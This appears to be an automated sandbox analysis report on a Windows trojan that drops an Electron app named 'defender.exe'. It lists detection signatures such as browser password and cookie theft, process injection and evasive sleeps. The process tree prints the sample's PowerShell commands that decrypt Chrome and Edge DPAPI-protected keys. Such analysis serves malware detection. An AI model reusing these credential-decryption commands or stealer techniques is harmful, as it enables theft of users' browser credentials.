Edit tour
Windows
Analysis Report
SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Icon mismatch, binary includes an icon from a different legit application in order to fool users
AI detected suspicious sample
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Steals Internet Explorer cookies
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe (PID: 4540 cmdline:
"C:\Users\ user\Deskt op\Securit eInfo.com. HEUR.Troja n.Script.G eneric.559 1.10617.ex e" MD5: A4590450863F13AA67198EC0FE52453E) - defender.exe (PID: 1660 cmdline:
C:\Users\u ser~1\AppD ata\Local\ Temp\2goCi mWNF4MQsEl UG17heiczR tP\defende r.exe MD5: 050F6E0968C055E912AB6CA8DC12A881) - cmd.exe (PID: 2324 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 2348 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 6244 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta sklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5876 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 6204 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 6176 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,235,192, 55,8,18,94 ,90,72,184 ,164,229,1 5,115,193, 217,43,16, 0,0,0,28,0 ,0,0,71,0, 111,0,111, 0,103,0,10 8,0,101,0, 32,0,67,0, 104,0,114, 0,111,0,10 9,0,101,0, 0,0,16,102 ,0,0,0,1,0 ,0,32,0,0, 0,184,143, 231,151,3, 164,155,25 2,199,5,18 0,234,105, 60,58,208, 131,221,11 3,254,201, 212,101,30 ,157,201,1 20,66,49,1 55,81,94,0 ,0,0,0,14, 128,0,0,0, 2,0,0,32,0 ,0,0,173,8 1,165,103, 189,238,23 ,248,169,1 43,199,131 ,217,35,10 5,8,51,181 ,214,59,46 ,122,49,16 9,137,191, 37,150,80, 49,185,106 ,48,0,0,0, 227,139,16 1,48,25,1, 188,206,13 ,98,179,20 9,192,72,4 4,5,18,32, 19,98,83,8 8,171,61,2 45,160,191 ,68,245,14 7,93,58,12 3,23,22,10 0,2,113,63 ,61,199,16 3,161,49,2 0,0,140,17 2,64,0,0,0 ,90,215,15 0,92,233,1 32,172,0,2 18,254,112 ,142,82,73 ,108,164,1 41,2,37,16 8,239,176, 249,140,16 3,197,218, 17,138,244 ,133,244,1 59,52,96,2 25,196,138 ,64,250,22 9,2,196,46 ,182,11,15 7,172,93,1 16,47,87,2 7,148,67,5 8,76,10,13 1,216,69,1 02,175,138 ), $null, 'CurrentUs er')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4116 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,235,19 2,55,8,18, 94,90,72,1 84,164,229 ,15,115,19 3,217,43,1 6,0,0,0,28 ,0,0,0,71, 0,111,0,11 1,0,103,0, 108,0,101, 0,32,0,67, 0,104,0,11 4,0,111,0, 109,0,101, 0,0,0,16,1 02,0,0,0,1 ,0,0,32,0, 0,0,184,14 3,231,151, 3,164,155, 252,199,5, 180,234,10 5,60,58,20 8,131,221, 113,254,20 1,212,101, 30,157,201 ,120,66,49 ,155,81,94 ,0,0,0,0,1 4,128,0,0, 0,2,0,0,32 ,0,0,0,173 ,81,165,10 3,189,238, 23,248,169 ,143,199,1 31,217,35, 105,8,51,1 81,214,59, 46,122,49, 169,137,19 1,37,150,8 0,49,185,1 06,48,0,0, 0,227,139, 161,48,25, 1,188,206, 13,98,179, 209,192,72 ,44,5,18,3 2,19,98,83 ,88,171,61 ,245,160,1 91,68,245, 147,93,58, 123,23,22, 100,2,113, 63,61,199, 163,161,49 ,20,0,140, 172,64,0,0 ,0,90,215, 150,92,233 ,132,172,0 ,218,254,1 12,142,82, 73,108,164 ,141,2,37, 168,239,17 6,249,140, 163,197,21 8,17,138,2 44,133,244 ,159,52,96 ,225,196,1 38,64,250, 229,2,196, 46,182,11, 157,172,93 ,116,47,87 ,27,148,67 ,58,76,10, 131,216,69 ,102,175,1 38), $null , 'Current User') MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 516 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "po wershell.e xe Add-Typ e -Assembl yName Syst em.Securit y; [System .Security. Cryptograp hy.Protect edData]::U nprotect([ byte[]]@(1 ,0,0,0,208 ,140,157,2 23,1,21,20 9,17,140,1 22,0,192,7 9,194,151, 235,1,0,0, 0,235,192, 55,8,18,94 ,90,72,184 ,164,229,1 5,115,193, 217,43,16, 0,0,0,30,0 ,0,0,77,0, 105,0,99,0 ,114,0,111 ,0,115,0,1 11,0,102,0 ,116,0,32, 0,69,0,100 ,0,103,0,1 01,0,0,0,1 6,102,0,0, 0,1,0,0,32 ,0,0,0,147 ,162,33,17 7,8,149,91 ,236,191,1 29,249,33, 231,27,148 ,12,171,12 2,36,70,24 4,154,79,7 3,117,181, 20,143,206 ,1,195,45, 0,0,0,0,14 ,128,0,0,0 ,2,0,0,32, 0,0,0,168, 140,205,23 8,188,26,2 06,16,147, 216,104,10 2,249,250, 177,217,11 3,177,11,1 0,219,34,1 81,223,104 ,67,90,97, 29,67,135, 198,48,0,0 ,0,111,7,2 7,76,231,1 28,167,166 ,236,58,4, 205,90,176 ,104,112,2 6,199,93,2 3,90,122,6 8,151,214, 153,146,80 ,144,62,95 ,230,165,1 47,143,143 ,143,124,1 18,123,23, 62,207,33, 112,187,13 7,178,64,0 ,0,0,245,9 4,155,216, 109,45,241 ,53,9,114, 77,116,165 ,235,237,8 6,72,111,7 4,87,234,8 3,100,234, 81,1,43,5, 153,85,142 ,192,206,1 73,232,251 ,142,136,1 82,197,146 ,115,49,12 0,202,240, 22,246,11, 50,180,177 ,166,7,64, 202,99,182 ,23,130,21 2,30,228,1 56), $null , 'Current User')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2256 cmdline:
powershell .exe Add-T ype -Assem blyName Sy stem.Secur ity; [Syst em.Securit y.Cryptogr aphy.Prote ctedData]: :Unprotect ([byte[]]@ (1,0,0,0,2 08,140,157 ,223,1,21, 209,17,140 ,122,0,192 ,79,194,15 1,235,1,0, 0,0,235,19 2,55,8,18, 94,90,72,1 84,164,229 ,15,115,19 3,217,43,1 6,0,0,0,30 ,0,0,0,77, 0,105,0,99 ,0,114,0,1 11,0,115,0 ,111,0,102 ,0,116,0,3 2,0,69,0,1 00,0,103,0 ,101,0,0,0 ,16,102,0, 0,0,1,0,0, 32,0,0,0,1 47,162,33, 177,8,149, 91,236,191 ,129,249,3 3,231,27,1 48,12,171, 122,36,70, 244,154,79 ,73,117,18 1,20,143,2 06,1,195,4 5,0,0,0,0, 14,128,0,0 ,0,2,0,0,3 2,0,0,0,16 8,140,205, 238,188,26 ,206,16,14 7,216,104, 102,249,25 0,177,217, 113,177,11 ,10,219,34 ,181,223,1 04,67,90,9 7,29,67,13 5,198,48,0 ,0,0,111,7 ,27,76,231 ,128,167,1 66,236,58, 4,205,90,1 76,104,112 ,26,199,93 ,23,90,122 ,68,151,21 4,153,146, 80,144,62, 95,230,165 ,147,143,1 43,143,124 ,118,123,2 3,62,207,3 3,112,187, 137,178,64 ,0,0,0,245 ,94,155,21 6,109,45,2 41,53,9,11 4,77,116,1 65,235,237 ,86,72,111 ,74,87,234 ,83,100,23 4,81,1,43, 5,153,85,1 42,192,206 ,173,232,2 51,142,136 ,182,197,1 46,115,49, 120,202,24 0,22,246,1 1,50,180,1 77,166,7,6 4,202,99,1 82,23,130, 212,30,228 ,156), $nu ll, 'Curre ntUser') MD5: 04029E121A0CFA5991749937DD22A1D9) - defender.exe (PID: 5140 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\2goC imWNF4MQsE lUG17heicz RtP\defend er.exe" -- type=gpu-p rocess --u ser-data-d ir="C:\Use rs\user\Ap pData\Roam ing\defend er" --gpu- preference s=UAAAAAAA AADgAAAYAA AAAAAAAAAA AAAAAABgAA AAAAAwAAAA AAAAAAAAAA AQAAAAAAAA AAAAAAAAAA AAAAAAAEgA AAAAAAAASA AAAAAAAAAY AAAAAgAAAB AAAAAAAAAA GAAAAAAAAA AQAAAAAAAA AAAAAAAOAA AAEAAAAAAA AAABAAAADg AAAAgAAAAA AAAACAAAAA AAAAA= --m ojo-platfo rm-channel -handle=18 32 --field -trial-han dle=1804,i ,216973766 2434373633 ,722180173 6705868447 ,131072 -- disable-fe atures=Spa reRenderer ForSitePer Process,Wi nRetrieveS uggestions OnlyOnDema nd /prefet ch:2 MD5: 050F6E0968C055E912AB6CA8DC12A881) - explorer.exe (PID: 4056 cmdline:
C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5) - defender.exe (PID: 5484 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\2goC imWNF4MQsE lUG17heicz RtP\defend er.exe" -- type=utili ty --utili ty-sub-typ e=network. mojom.Netw orkService --lang=en -GB --serv ice-sandbo x-type=non e --user-d ata-dir="C :\Users\us er\AppData \Roaming\d efender" - -mojo-plat form-chann el-handle= 2132 --fie ld-trial-h andle=1804 ,i,2169737 6624343736 33,7221801 7367058684 47,131072 --disable- features=S pareRender erForSiteP erProcess, WinRetriev eSuggestio nsOnlyOnDe mand /pref etch:8 MD5: 050F6E0968C055E912AB6CA8DC12A881) - defender.exe (PID: 2324 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\2goC imWNF4MQsE lUG17heicz RtP\defend er.exe" -- type=rende rer --user -data-dir= "C:\Users\ user\AppDa ta\Roaming \defender" --app-pat h="C:\User s\user~1\A ppData\Loc al\Temp\2g oCimWNF4MQ sElUG17hei czRtP\reso urces\app. asar" --no -sandbox - -no-zygote --first-r enderer-pr ocess --la ng=en-GB - -device-sc ale-factor =1 --num-r aster-thre ads=2 --en able-main- frame-befo re-activat ion --rend erer-clien t-id=4 --t ime-ticks- at-unix-ep och=-17227 8127576775 9 --launch -time-tick s=44435869 76 --mojo- platform-c hannel-han dle=2360 - -field-tri al-handle= 1804,i,216 9737662434 373633,722 1801736705 868447,131 072 --disa ble-featur es=SpareRe ndererForS itePerProc ess,WinRet rieveSugge stionsOnly OnDemand / prefetch:1 MD5: 050F6E0968C055E912AB6CA8DC12A881)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |